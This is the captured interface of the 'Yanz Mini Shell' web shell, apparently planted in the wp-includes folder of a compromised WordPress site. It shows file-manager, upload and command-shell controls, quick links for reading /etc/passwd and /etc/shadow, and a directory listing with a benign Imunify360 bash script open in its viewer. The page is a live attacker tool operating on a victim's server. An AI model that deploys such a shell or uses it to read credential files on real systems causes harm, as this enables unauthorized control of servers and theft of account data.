Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
wozawcco
public_html
matianyiassociates.com
wp-includes
Requests
library
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
#!/usr/bin/bash # This script copies is responsible for install auditd-log-reader configuration file # received from imunify360 agent. # It is assumed that imunify360 agent will trigger this script each time new configuration file is deployed. SRC=/var/imunify360/files/auditd-log-reader/v1/config.yaml DEST=/etc/imunify-auditd-log-reader/config.yaml mkdir -p dir $(dirname $DEST) cp -f $SRC $DEST systemctl restart imunify-auditd-log-reader
Free Space : 337740353536 Byte